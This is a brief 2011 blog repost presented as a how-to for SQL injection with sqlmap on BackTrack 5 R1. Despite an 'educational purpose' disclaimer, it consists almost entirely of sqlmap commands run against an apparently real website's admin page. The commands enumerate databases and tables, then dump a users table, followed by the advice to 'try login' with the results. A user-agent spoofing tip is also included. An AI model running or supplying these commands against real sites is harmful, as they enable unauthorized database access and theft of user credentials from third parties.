Friday, September 16, 2011

HOWTO : SQL Injection with SQLmap on Back|Track 5 R1

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to :ruo911

This is ruo911's work but not mine. I re-post it for educational purpose only.



Command

cd /pentest/web/scanners/sqlmap
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 --dbs
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -D pjirc_forum --tables
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users --columns
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users -U test --dump


try login.

p.s
1. Backtrack 5 R1 - sqlmap
cd /pentest/database/sqlmap

2. user agent options
example)
--user-agent="Mozilla/5.0 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"

That's all! See you.